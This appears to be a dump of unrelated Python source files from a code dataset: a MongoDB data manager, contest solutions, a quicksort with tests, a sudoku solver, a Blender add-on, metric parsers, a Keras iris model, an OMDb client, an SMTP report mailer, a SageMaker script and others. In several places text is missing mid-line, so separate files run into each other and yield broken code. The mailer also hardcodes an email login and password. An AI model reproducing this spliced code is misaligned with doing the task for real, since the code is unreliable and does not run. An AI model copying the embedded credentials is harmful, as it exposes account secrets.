self._jar.dump(value)\n if self.get(key) is not None:\n del self[key]\n doc = {'ref': dbref, 'name': key}\n self._collection_inst.insert(doc)\n\n def 
__delitem__(self, key):\n doc = self._collection_inst.find_one(\n processSpec(self._collection_inst, {'name': key}))\n coll = self._jar._conn[doc['ref'].database][doc['ref'].collection]\n coll.remove(doc['ref'].id)\n self._collection_inst.remove({'name': key})\n\n def keys(self):\n return [doc['name'] for doc in self._collection_inst.find()]\n\n\nclass MongoDataManager(object):\n zope.interface.implements(interfaces.IMongoDataManager)\n\n detect_conflicts = False\n default_database = 'mongopersist'\n name_map_collection = 'persistence_name_map'\n conflict_error_factory = staticmethod(create_conflict_error)\n\n def __init__(self, conn, detect_conflicts=None, default_database=None,\n root_database=None, root_collection=None,\n name_map_collection=None, conflict_error_factory=None):\n self._conn = conn\n self._reader = serialize.ObjectReader(self)\n self._writer = serialize.ObjectWriter(self)\n self._registered_objects = []\n self._loaded_objects = []\n self._needs_to_join = True\n self._object_cache = {}\n self.annotations = {}\n if detect_conflicts is not None:\n self.detect_conflicts = detect_conflicts\n if default_database is not None:\n self.default_database = default_database\n if name_map_collection is not None:\n self.name_map_collection = name_map_collection\n if conflict_error_factory is not None:\n self.conflict_error_factory = conflict_error_factory\n self.transaction_manager = transaction.manager\n self.root = Root(self, root_database, root_collection)\n\n def dump(self, obj):\n return self._writer.store(obj)\n\n def load(self, dbref):\n return self._reader.get_ghost(dbref)\n\n def reset(self):\n root = self.root\n self.__init__(self._conn)\n self.root = root\n\n def setstate(self, obj):\n # When reading a state from Mongo, we also need to join the\n # transaction, because we keep an active object cache that gets stale\n # after the transaction is complete and must be cleaned.\n if self._needs_to_join:\n self.transaction_manager.get().join(self)\n self._needs_to_join = False\n self._reader.set_ghost_state(obj)\n self._loaded_objects.append(obj)\n\n def oldstate(self, obj, tid):\n # I cannot find any code using this method. 
Also, since we do not keep\n # version history, we always raise an error.\n raise KeyError(tid)\n\n def register(self, obj):\n if self._needs_to_join:\n self.transaction_manager.get().join(self)\n self._needs_to_join = False\n\n if obj is not None and obj not in self._registered_objects:\n self._registered_objects.append(obj)\n\n def abort(self, transaction):\n self.reset()\n\n def commit(self, transaction):\n if not self.detect_conflicts:\n return\n # Check each modified object to see whether Mongo has a new version of\n # the object.\n for obj in self._registered_objects:\n # This object is not even added to the database yet, so there\n # cannot be a conflict.\n if obj._p_oid is None:\n continue\n db_name, coll_name = self._writer.get_collection_name(obj)\n coll = self._conn[db_name][coll_name]\n new_doc = coll.find_one(obj._p_oid.id, fields=('_py_serial',))\n if new_doc is None:\n continue\n if new_doc.get('_py_serial', 0) != serialize.u64(obj._p_serial):\n raise self.conflict_error_factory(obj, new_doc)\n\n def tpc_begin(self, transaction):\n pass\n\n def tpc_vote(self, transaction):\n pass\n\n def tpc_finish(self, transaction):\n written = []\n for obj in self._registered_objects:\n if getattr(obj, '_p_mongo_sub_object', False):\n obj = obj._p_mongo_doc_object\n if obj in written:\n continue\n self._writer.store(obj)\n written.append(obj)\n self.reset()\n\n def tpc_abort(self, transaction):\n self.abort(transaction)\n\n def sortKey(self):\n return ('MongoDataManager', 0)\n","sub_path":"mongopersist/tags/0.5.4/src/mongopersist/datamanager.py","file_name":"datamanager.py","file_ext":"py","file_size_in_byte":6492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"526058618","text":"\n\n\n\nif __name__ == '__main__':\n\tf = open('A-small-attempt0.in', 'r')\n\tg = open('output.txt', 'w')\n\tT = int(f.readline())\n\n\tfor caseNum in range(T):\n\t\tline1 = int(f.readline())\n\t\tline2 = f.readline()\n\t\tnums = [int(c) for c in line2.split()]\n\t\tx = 0\n\t\tfor i in range(len(nums)-1):\n\t\t\tif(nums[i+1]= pivotKey:\n right -= 1\n while left < right and self.__resultList[left] <= pivotKey:\n left += 1\n self.__swap(left, right)\n self.__swap(pivotPointer, left)\n return left\n\n def __sort(self, left, right):\n if left >= right:\n return\n pivotPosition = self.__partition(left, right)\n self.__sort(left, pivotPosition - 1)\n self.__sort(pivotPosition + 1, right)\n\n def __swap(self, left, right):\n self.__resultList[left], self.__resultList[right] = self.__resultList[right], self.__resultList[left]\n\nclass TestSolution(unittest.TestCase):\n def setUp(self):\n self.quick_sort_solution = Solution()\n\n def tearDown(self):\n pass\n\n def test_quick_sort_normal(self):\n a1_list = [5, 3, 8, 6, 4]\n a2_list = [15, 198, 2, 0, -18, 1000, 120]\n self.assertEqual(self.quick_sort_solution.quick_sort(a1_list), [3, 4, 5, 6, 8])\n self.assertEqual(self.quick_sort_solution.quick_sort(a2_list), [-18, 0, 2, 15, 120, 198, 1000])\n\n def test_quick_sort_none(self):\n none_list = None\n self.assertEqual(self.quick_sort_solution.quick_sort(none_list), [])\n\n def test_quick_sort_empty(self):\n empty_list = None\n self.assertEqual(self.quick_sort_solution.quick_sort(empty_list), [])\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"sort/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} 
+{"seq_id":"95307822","text":"#!/usr/bin/env python3\n\n#https://codeforces.com/problemset/problem/1176/C\n#最少移除的数字,使得剩余6l个数可以分为l个子序列[4,8,15,16,23,42]\n#贪心?\n\nn = int(input()) #5e5\nal = list(map(int,input().split()))\n\nrl = [4,8,15,16,23,42]\ncl = [0]*6\nfor i in range(n):\n p = rl.index(al[i])\n if p==0 or cl[p] None:\n # 对 board[i][j] 进行穷举尝试\n def backtrack(board, i, j):\n m, n = 9, 9\n if j == n: # 走到9才越界,进入下一行\n return backtrack(board, i+1, 0)\n if i == m: # 走到最后一行,找到一个可行解\n return True\n if board[i][j] != '.': # 当前是预设数字,直接跳到下一个\n return backtrack(board, i, j+1)\n\n ch_list = ['1','2','3','4','5','6','7','8','9']\n for ch in ch_list:\n if not isValid(board, i, j, ch): # 如果遇到不合法的数字,则跳过\n continue\n\n board[i][j] = ch # 做选择\n if backtrack(board, i, j+1): # 如果找到一个可行解,立即结束\n return True\n board[i][j] = '.' # 撤销选择\n # 穷举完 1~9,依然没有找到可行解,此路不通\n return False\n\n # 判断 board[i][j] 是否可以填入 n\n def isValid(board, r, c, n):\n for i in range(9):\n # 判断行是否存在重复\n if board[r][i] == n: return False\n # 判断列是否存在重复\n if board[i][c] == n: return False\n # 判断 3 * 3 方框是否存在重复\n if board[(r//3)*3 + i//3][(c//3)*3 + i%3] == n:\n return False\n return True\n\n backtrack(board, 0, 0)","sub_path":"37_解数独.py","file_name":"37_解数独.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"254805415","text":"import bpy\n\nbl_info = {\"name\": \"Align Shapes x\",\n \"author\": \"Team Cobra\",\n \"location\": \"View3D > Align > Shape > x axis\",\n \"version\": (1, 0, 0),\n \"blender\": (2, 80, 0),\n \"description\": \"Align shapes along the x axis\",\n \"category\": \"Align Shape\", }\n\n\nclass AlignShapesx(bpy.types.Operator):\n bl_idname = \"action.align_shapesx\"\n bl_label = \"Align Shapes x\"\n\n def invoke(self, context, event):\n i = 0\n # in order to change spacing between objects, change the number that i is multiplied by in the for loop\n for object in list(bpy.context.collection.objects):\n object.select_set(state=True)\n object.location.x = i*10\n object.location.y = 0\n object.location.z = 0\n object.select_set(state=False)\n i += 1\n return {\"FINISHED\"}\n\n\nclasses = (AlignShapesx,)\n\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n\n\ndef unregister():\n for cls in reversed(classes):\n bpy.utils.unregister_class(cls)\n","sub_path":"AlignShapesx.py","file_name":"AlignShapesx.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"532124015","text":"import sys\nimport argparse\nimport os\nimport initialize\nimport subprocess\n\nparser = argparse.ArgumentParser(description='Tools to help create and open python files')\nparser.add_argument('pyname', nargs='?', type=str)\nparser.add_argument('-s', '--project_type', nargs='?', type=str, const='script', choices=['project', 'script'],\n default='project', help='Project or script?')\nargs = parser.parse_args()\n\n# Check if config.ini has been created\nif os.path.exists('config.ini') is False:\n initialize.create_config()\n exit()\nelse:\n from initialize import path\n\n# Checks that there is at least one argument\nif len(sys.argv) == 1:\n print('ERROR: Input at least one argument')\n exit()\n\n# Sets the directories based on -s, --project_type\nactive_dir = \"\"\ntry:\n if args.project_type == 'project':\n active_dir = path['project_dir']\n os.chdir(active_dir)\n if args.project_type == 'script':\n active_dir = path['script_dir']\n 
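# switch into whichever base directory matched --project_type; the except below fires when the config.ini paths are unset\n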
os.chdir(active_dir)\nexcept OSError:\n print('ERROR: Set your paths in the Config.ini file')\n os.system('config.ini')\n exit()\n\nfolder = active_dir + r'\\%s' % args.pyname\nsubprocess.Popen([path['ide_path'], folder])\n","sub_path":"pyopen.py","file_name":"pyopen.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"89483673","text":"import os\nimport re\nimport csv\nfrom collections import defaultdict\n\n\nfilename_regex = re.compile(r\"^[a-z]+\\/(\\d+)-(\\d+)-\\d+.out\", flags=re.I)\n\n\ndef parse_metrics_file(f, metrics):\n lines = [l.strip() for l in open(f, \"r\").readlines()]\n start_idx = 0\n\n for line in lines:\n if \"overflow\" in line:\n print(\"overflowed in\", f)\n return\n if \"Warning\" in line:\n print(\"failed something\", f)\n return\n\n key = tuple(int(i) for i in filename_regex.findall(f)[0])\n entry = {}\n\n for i, row in enumerate(lines):\n if row.startswith(\"Kernel: find_hash(int, int)\"):\n start_idx = i+1\n\n for row in lines[start_idx:]:\n items = row.split()\n metric = items[1]\n val_candidate = list(\n filter(None, [x.strip() for x in items[-1].split(\"%\")]))[0]\n val = float(val_candidate)\n entry[metric] = val\n\n metrics[key].append(entry)\n\n\ndef average_metrics_results(metrics):\n parsed_metrics = {}\n\n for run, results in metrics.items():\n metrics_types = results[0].keys()\n average_results = {}\n\n for metric in metrics_types:\n total = 0\n for r in results:\n total += r[metric]\n\n average_results[metric] = total / len(results)\n\n parsed_metrics[run] = average_results\n\n return parsed_metrics\n\n\ndef parse_metrics_files():\n metrics = defaultdict(list)\n\n for f in os.listdir(\"./metrics\"):\n fn = \"metrics/\" + f\n\n if f.endswith(\".out\"):\n try:\n parse_metrics_file(fn, metrics)\n except Exception as e:\n print(e)\n print(fn)\n\n parsed_results = average_metrics_results(metrics)\n\n keys = list(parsed_results.values())[0].keys()\n return parsed_results\n\n\ndef parse_timings_file(f, timings):\n lines = [l.strip() for l in open(f, \"r\").readlines()]\n\n for line in lines:\n if \"overflow\" in line:\n print(\"overflowed in\", f)\n return\n if \"Warning\" in line:\n print(\"failed something\", f)\n return\n\n key = tuple(int(i) for i in filename_regex.findall(f)[0])\n\n for row in lines:\n if \"find_hash(int, int)\" in row:\n elements = row.replace(\"find_hash(int, int)\", \"\").strip().split()\n avg_timing = elements[-3]\n\n if \"ms\" in avg_timing:\n factor = 1\n avg_timing = avg_timing.replace(\"ms\", \"\")\n elif \"us\" in avg_timing:\n factor = 0.001\n avg_timing = avg_timing.replace(\"us\", \"\")\n elif \"s\" in avg_timing:\n factor = 1000\n avg_timing = avg_timing.replace(\"s\", \"\")\n\n parsed_timing = float(avg_timing) * factor\n\n timings[key].append(parsed_timing)\n return\n\n\ndef average_timings_results(timings):\n parsed_timings = {}\n\n for run, results in timings.items():\n average_results = sum(results)/len(results)\n\n parsed_timings[run] = {\"total_time\": average_results}\n\n return parsed_timings\n\n\ndef parse_timings_files():\n timings = defaultdict(list)\n\n for f in os.listdir(\"./memory\"):\n fn = \"memory/\" + f\n\n if f.endswith(\".out\"):\n try:\n parse_timings_file(fn, timings)\n except Exception as e:\n print(e)\n print(fn)\n\n parsed_results = average_timings_results(timings)\n\n return parsed_results\n\n\ndef parse_event_file(f, events):\n lines = [l.strip() for l in open(f, \"r\").readlines()]\n start_idx = 
0\n\n for line in lines:\n if \"overflow\" in line:\n print(\"overflowed in\", f)\n return\n if \"Warning\" in line:\n print(\"failed something\", f)\n return\n\n key = tuple(int(i) for i in filename_regex.findall(f)[0])\n\n entry = {}\n\n for i, row in enumerate(lines):\n if row.startswith(\"Kernel: find_hash(int, int)\"):\n start_idx = i+1\n\n for row in lines[start_idx:]:\n items = row.split()\n event = items[1]\n val = float(items[-1])\n entry[event] = val\n\n events[key].append(entry)\n\n\ndef average_event_results(events):\n parsed_events = {}\n\n for run, results in events.items():\n event_types = results[0].keys()\n average_results = {}\n\n for event in event_types:\n total = 0\n for r in results:\n total += r[event]\n\n average_results[event] = total / len(results)\n\n parsed_events[run] = average_results\n\n return parsed_events\n\n\ndef parse_event_files():\n events = defaultdict(list)\n\n for f in os.listdir(\"./events\"):\n if f.endswith(\".out\"):\n fn = \"events/\" + f\n try:\n parse_event_file(fn, events)\n except Exception as e:\n print(e)\n print(fn)\n\n parsed_results = average_event_results(events)\n\n keys = list(parsed_results.values())[0].keys()\n\n return parsed_results\n\n\ndef combine_results(*results):\n if not results:\n return\n\n combined = defaultdict(dict)\n runs = results[0].keys()\n\n for run in runs:\n for res in results:\n combined[run].update(res[run])\n\n csv_file = open(\"combined.csv\", \"w\")\n writer = csv.writer(csv_file)\n keys = list(combined.values())[0].keys()\n writer.writerow([\"blocks\", \"threads\", \"blocks_times_threads\"] + list(keys))\n for k, v in combined.items():\n blocks, threads = k\n row = [blocks, threads, blocks * threads]\n for e in keys:\n row.append(v.get(e))\n\n writer.writerow(row)\n csv_file.close()\n\n\nif __name__ == \"__main__\":\n print(\"parsing metrics\")\n metrics = parse_metrics_files()\n print(\"parsing timings\")\n timings = parse_timings_files()\n print(\"parsing events\")\n events = parse_event_files()\n print(\"combining results\")\n combine_results(timings, metrics, events)\n","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507435529","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jan 4 09:51:50 2019\r\n\r\n@author: Jikhan Jeong\r\n\"\"\"\r\n\r\n## 2019 Spring, Mulit_calss_Iris\r\n## reference : https://github.com/gilbutITbook/006958\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n\r\nimport numpy\r\nimport tensorflow as tf\r\nimport pandas as pd\r\n\r\n## Setting for handling randomness to generate the same results in each trials\r\nseed = 0\r\nnumpy.random.seed(seed)\r\ntf.set_random_seed(seed)\r\n\r\ndf = pd.read_csv(\"C:/python/a_python/2019_Spring_Deep_learning/dataset/iris.csv\",\r\n names = [\"sepal_length\",\"sepal_width\",\"petal_length\",\"petal_width\",\"species\"])\r\n\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nsns.pairplot(df, hue='species');\r\nplt.show()\r\n\r\ndataset = df.values\r\nX = dataset[:,0:4].astype(float)\r\nY_obj = dataset[:,4] # string values for classes, 3 classes\r\ntype(Y_obj)\r\n\r\nfrom sklearn.preprocessing import LabelEncoder\r\ne = LabelEncoder()\r\ne.fit(Y_obj)\r\nY = e.transform(Y_obj) # string to numerical \r\n\r\nfrom keras.utils import np_utils\r\nY_encoded = np_utils.to_categorical(Y) # one-hot encoding\r\n\r\nmodel = Sequential()\r\nmodel.add(Dense(16, 
input_dim=4, activation = 'relu')) # input and hidden 1 layer\r\nmodel.add(Dense(3, activation ='softmax')) # output layer, softmax is used\r\n\r\nmodel.compile(loss ='categorical_crossentropy', # because it is a multiclass problem\r\n optimizer ='adam',\r\n metrics=['accuracy'])\r\n\r\nmodel.fit(X,Y_encoded, epochs =50, batch_size= 1) # Executing the model\r\n\r\nprint(\"\\n Accuracy: %.4f\" % (model.evaluate(X,Y_encoded)[1]))\r\n\r\n","sub_path":"2019 Spring, Iris.py","file_name":"2019 Spring, Iris.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"147568753","text":"import requests as req\r\n\r\n\r\nAPI_KEY = 'Your_api_key_here'\r\n\r\ndef search_by_title(movie_title):\r\n url = \"http://www.omdbapi.com/?apikey={}&t={}\".format(API_KEY, movie_title)\r\n retorno = req.get(url).json()\r\n d = {}\r\n\r\n if retorno['Response'] == 'True':\r\n\r\n d['year'] = retorno['Year']\r\n d['title'] = retorno['Title']\r\n d['director'] = retorno['Director']\r\n d['genre'] = retorno['Genre']\r\n d['poster'] = retorno['Poster']\r\n d['actors'] = retorno['Actors']\r\n\r\n if retorno['Ratings'][0]['Value'] == \"N/A\":\r\n d['internet_movie_database'] = None\r\n\r\n else:\r\n d['internet_movie_database'] = retorno['Ratings'][0]['Value']\r\n \r\n if retorno['Ratings'][1]['Value'] == \"N/A\":\r\n d['rotten_tomatoes'] = None\r\n\r\n else:\r\n d['rotten_tomatoes'] = retorno['Ratings'][1]['Value']\r\n\r\n if retorno['Ratings'][2]['Value'] == \"N/A\":\r\n d['metacritic'] = None\r\n \r\n else:\r\n d['metacritic'] = retorno['Ratings'][2]['Value']\r\n\r\n return d\r\n","sub_path":"omdb.py","file_name":"omdb.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"412865001","text":"import argparse\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.externals import joblib\nimport os\nimport pandas as pd\nimport sys\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n # Get train test split ratio\n parser.add_argument(\"--test-ratio\", type=float, default=0.2)\n parser.add_argument(\"--random-state\", type=int, default=42)\n\n # Get tree parameters\n parser.add_argument(\"--criterion\", type=str, default=\"mse\")\n parser.add_argument(\"--splitter\", type=str, default=\"best\")\n parser.add_argument(\"--max-depth\", type=int, default=None)\n parser.add_argument(\"--min-samples-split\", type=float, default=2)\n parser.add_argument(\"--min-samples-leaf\", type=float, default=1)\n parser.add_argument(\"--min-weight-fraction-leaf\", type=float, default=0.0)\n parser.add_argument(\"--max-features\", type=float, default=None)\n parser.add_argument(\"--max-leaf-nodes\", type=int, default=None)\n parser.add_argument(\"--min-impurity-decrease\", type=float, default=0)\n\n # Parse environment variables set by Amazon SageMaker\n parser.add_argument('--output-data-dir', type=str, default=os.environ.get('SM_OUTPUT_DATA_DIR'))\n parser.add_argument('--model-dir', type=str, default=os.environ.get('SM_MODEL_DIR'))\n parser.add_argument('--train', type=str, default=os.environ.get('SM_CHANNEL_TRAIN'))\n\n # Parse all arguments\n args, _ = parser.parse_known_args()\n\n # Load the training data\n input_files = [ os.path.join(args.train, file) for file in os.listdir(args.train) ]\n if len(input_files) == 0:\n raise 
ValueError(('There are no files in {}.\\n' +\n 'This usually indicates that the channel ({}) was incorrectly specified,\\n' +\n 'the data specification in S3 was incorrectly specified or the role specified\\n' +\n 'does not have permission to access the data.').format(args.train, \"train\"))\n raw_data = [ pd.read_csv(file, header=None, engine=\"python\", skiprows=1 ) for file in input_files ]\n train_data = pd.concat(raw_data)\n\n # Split into X and y\n train_data = train_data.values\n X = train_data[:, :-1]\n y = train_data[:, -1]\n\n # Split into train and test set\n X_train, X_test, y_train, y_test = train_test_split(\n X, y,\n test_size=args.test_ratio,\n random_state=args.random_state\n )\n\n # Create model and train using training set\n clf = DecisionTreeRegressor(\n criterion=args.criterion,\n splitter=args.splitter,\n max_depth=args.max_depth,\n min_samples_split=args.min_samples_split,\n min_samples_leaf=args.min_samples_leaf,\n min_weight_fraction_leaf=args.min_weight_fraction_leaf,\n max_features=args.max_features,\n max_leaf_nodes=args.max_leaf_nodes,\n min_impurity_decrease=args.min_impurity_decrease\n )\n clf.fit(X_train, y_train)\n\n # Make predictions\n y_train_prediction = clf.predict(X_train)\n y_test_prediction = clf.predict(X_test)\n\n # Calculate f1 score\n train_mse = mean_squared_error(y_train, y_train_prediction)\n test_mse = mean_squared_error(y_test, y_test_prediction)\n\n # Emit metrics\n sys.stdout.write(f\"Train_mse={train_mse};\")\n sys.stdout.write(f\"Test_mse={test_mse};\")\n\n # Save model to dir\n joblib.dump(clf, os.path.join(args.model_dir, \"model.joblib\"))\n\n\n# Model function to load the model\ndef model_fn(model_dir):\n clf = joblib.load(os.path.join(model_dir, \"model.joblib\"))\n return clf","sub_path":"Backend/mlmodels/scripts/decision_tree_regression_script.py","file_name":"decision_tree_regression_script.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"354673324","text":"import os\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\ndef send_mail(file_new):\n # 找到html复制到邮件上\n f = open(file_new)\n mail_body = f.read()\n f.close()\n msg=MIMEMultipart()\n msg[\"subject\"] = \"接口测试报告\" #主题\n # # 正文\n # body = MIMEText(mail_body, \"html\", \"utf-8\")\n # msg.attach(body)\n # 附件\n att=MIMEText(mail_body, \"base64\", \"utf-8\")\n att[\"Content-Type\"] = \"application/octet-stream\"\n att[\"Content-Disposition\"] = 'attachment; filename=\"测试报告.html\"'\n msg.attach(att)\n # 发送邮件\n smtp = smtplib.SMTP()\n smtp.connect('smtp.163.com')\n smtp.login('18230149962@163.com','qwe123456.')\n smtp.sendmail('18230149962@163.com','18230149962@163.com',msg.as_string())\n smtp.quit()\n\n print('邮件已发送')\n\n\n\n\nif __name__ == '__main__':\n file_path = \"D:\\\\chengan\\\\doraemon\\src\\\\report\\\\测试报告.html\"\n lists = os.path.dirname(file_path)\n file_new = os.path.split(file_path)[-1]\n send_mail(file_new)","sub_path":"test/interface/rlg.py","file_name":"rlg.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"354729366","text":"from geomutils import midpoint\nfrom math import sqrt\nfrom numpy.random import normal\nimport matplotlib.pyplot as plt\nimport matplotlib.collections\nimport argparse\n\nTOLERANCE = 0.01 #epsilon\n\ndef brownian_bridge(frm, to, variance, scale):\n points = []\n if abs(to[0] - frm[0]) < 
TOLERANCE:\n points += [(frm ,to)]\n else:\n m = midpoint(frm,to)\n rand_height = normal(0,sqrt(variance))\n m = m[0], m[1] +rand_height\n points += brownian_bridge(frm, m, variance/scale, scale)\n points += brownian_bridge(m, to, variance/scale, scale)\n return points\n\ndef brownian_island(frm, to, variance, scale, n):\n if n == 0:\n return [(frm, to)]\n m = midpoint(frm,to)\n rand_height = normal(0,sqrt(variance))\n rand_width = normal(0,sqrt(variance))\n m = m[0] + rand_width, m[1] +rand_height\n points = []\n points += brownian_island(frm, m, variance/scale, scale, n-1)\n points += brownian_island(m, to, variance/scale, scale, n-1)\n return points\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Draw a brownian bridge or island')\n parser.add_argument('hurst_exponent', type=float, help='Hurst exponent : controls smoothness')\n parser.add_argument('--volatility', type=float, help='volatility as variance')\n\n args = parser.parse_args()\n hurst_exponent = args.hurst_exponent\n if args.volatility:\n volatility = args.volatility\n else:\n volatility = 0.01\n\n scale = 2**(2*hurst_exponent)\n # scale = 2.7\n # ps = brownian_bridge((0,1/2),(1,1/2), volatility, scale)\n ps = brownian_island((1/2,1/2),(1/2,1/2), volatility, scale, 10) #Enter volatility 0.75 from commandline\n\n lc = matplotlib.collections.LineCollection(ps)\n fig, ax = plt.subplots(1,1)\n ax.axis('equal')\n ax.add_collection(lc)\n ax.set_xlim([0,1])\n ax.set_ylim([0,1])\n ax.set_title('Brownian bridge')\n plt.show()\n","sub_path":"brownian_bridge.py","file_name":"brownian_bridge.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"589433792","text":"\"\"\"\nDefines cage topologies of building blocks with 3 functional groups.\n\n\"\"\"\n\nimport numpy as np\nfrom scipy.spatial.distance import euclidean\n\nfrom .base import NoLinkerCageTopology, Vertex\n\n\nclass OnePlusOne(NoLinkerCageTopology):\n \"\"\"\n A sandwich cage topology from tri-functionalised building blocks.\n\n \"\"\"\n\n x = 1\n positions_A = [Vertex(x, 0., 0.),\n Vertex(-x, 0., 0.)]\n a, b = positions_A\n connections = [(a, b)]\n\n a.edge_plane_normal = lambda scale: scale*np.array([1, 0, 0])\n b.edge_plane_normal = lambda scale: scale*np.array([-1, 0, 0])\n\n a.edge_centroid = lambda scale: scale*np.array([0, 0, 0])\n b.edge_centroid = lambda scale: scale*np.array([0, 0, 0])\n\n n_windows = 3\n n_window_types = 1\n\n def bonded_fgs(self, macro_mol):\n\n for position in self.positions_A:\n other_position = next(x for x in self.positions_A if\n x is not position)\n\n position.fg_position_pairs = [\n (fg, other_position) for fg in position.fgs\n ]\n\n for fg1, vertex in position.fg_position_pairs:\n # Get all the distances between the fg and the fgs\n # on the vertex. 
Store this information on the vertex.\n\n for fg2 in vertex.fgs:\n c1 = macro_mol.atom_centroid(fg1.bonder_ids)\n c2 = macro_mol.atom_centroid(fg2.bonder_ids)\n distance = euclidean(c1, c2)\n position.distances.append((distance, fg1, fg2))\n\n paired = set()\n for position in self.positions_A:\n for _, fg1, fg2 in sorted(position.distances):\n if fg1 in paired or fg2 in paired:\n continue\n\n # Add the bond.\n yield fg1, fg2\n paired.add(fg1)\n paired.add(fg2)\n\n\nclass TwoPlusTwo(NoLinkerCageTopology):\n \"\"\"\n Tetrahedral cage topology from tri-functionalised building blocks.\n\n \"\"\"\n\n x = 1\n positions_A = [Vertex(x, 0, -x/np.sqrt(2)),\n Vertex(-x, 0, -x/np.sqrt(2)),\n Vertex(0, x, x/np.sqrt(2)),\n Vertex(0, -x, x/np.sqrt(2))]\n\n a, b, c, d = positions_A\n\n for x in positions_A:\n old_normal = x.edge_plane_normal\n x.edge_plane_normal = lambda scale, a=old_normal: -1*a(scale)\n\n connections = [(a, b), (a, c), (a, d),\n (b, c), (b, d),\n (c, d)]\n\n n_windows = 4\n n_window_types = 1\n\n\nclass FourPlusFour(NoLinkerCageTopology):\n \"\"\"\n A square cage topology from tri-functionalised building blocks.\n\n \"\"\"\n\n x = 1\n positions_A = [Vertex(-x, x, -x),\n Vertex(-x, -x, -x),\n Vertex(x, x, -x),\n Vertex(x, -x, -x),\n\n Vertex(-x, x, x),\n Vertex(-x, -x, x),\n Vertex(x, x, x),\n Vertex(x, -x, x)]\n\n a, b, c, d, e, f, g, h = positions_A\n\n connections = [(a, b), (a, c), (a, e), (b, d), (b, f), (c, g),\n (c, d), (d, h), (e, g), (e, f), (f, h), (g, h)]\n\n n_windows = 6\n n_window_types = 1\n","sub_path":"stk/molecular/topologies/cage/three_plus_three.py","file_name":"three_plus_three.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"207723224","text":"# Copyright 2019 Red Hat\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\nfrom __future__ import absolute_import\n\nfrom tobiko.openstack.neutron import _agent\nfrom tobiko.openstack.neutron import _client\nfrom tobiko.openstack.neutron import _cidr\nfrom tobiko.openstack.neutron import _extension\nfrom tobiko.openstack.neutron import _floating_ip\nfrom tobiko.openstack.neutron import _port\nfrom tobiko.openstack.neutron import _quota_set\nfrom tobiko.openstack.neutron import _network\nfrom tobiko.openstack.neutron import _router\nfrom tobiko.openstack.neutron import _subnet\n\n\nSERVER = 'neutron-server'\nDHCP_AGENT = _agent.DHCP_AGENT\nL3_AGENT = _agent.L3_AGENT\nMETADATA_AGENT = _agent.METADATA_AGENT\nOPENVSWITCH_AGENT = _agent.OPENVSWITCH_AGENT\nOVN_CONTROLLER = _agent.OVN_CONTROLLER\nOVN_METADATA_AGENT = _agent.OVN_METADATA_AGENT\nNEUTRON_OVN_METADATA_AGENT = _agent.NEUTRON_OVN_METADATA_AGENT\nAgentNotFoundOnHost = _agent.AgentNotFoundOnHost\nNeutronAgentType = _agent.NeutronAgentType\nget_l3_agent_mode = _agent.get_l3_agent_mode\nfind_l3_agent_hosting_router = _agent.find_l3_agent_hosting_router\nlist_agents = _agent.list_agents\nlist_dhcp_agent_hosting_network = _agent.list_dhcp_agent_hosting_network\nlist_l3_agent_hosting_routers = _agent.list_l3_agent_hosting_routers\nlist_networking_agents = _agent.list_networking_agents\nskip_if_missing_networking_agents = _agent.skip_if_missing_networking_agents\nskip_unless_is_ovn = _agent.skip_unless_is_ovn\nskip_unless_is_ovs = _agent.skip_unless_is_ovs\nskip_if_is_old_ovn = _agent.skip_if_is_old_ovn\nhas_ovn = _agent.has_ovn\nhas_ovs = _agent.has_ovs\n\nNeutronClientFixture = _client.NeutronClientFixture\nServiceUnavailable = _client.ServiceUnavailable\nNeutronClient = _client.NeutronClient\nNeutronClientException = _client.NeutronClientException\nNeutronClientType = _client.NeutronClientType\nneutron_client = _client.neutron_client\nget_neutron_client = _client.get_neutron_client\n\nnew_ipv4_cidr = _cidr.new_ipv4_cidr\nnew_ipv6_cidr = _cidr.new_ipv6_cidr\nlist_subnet_cidrs = 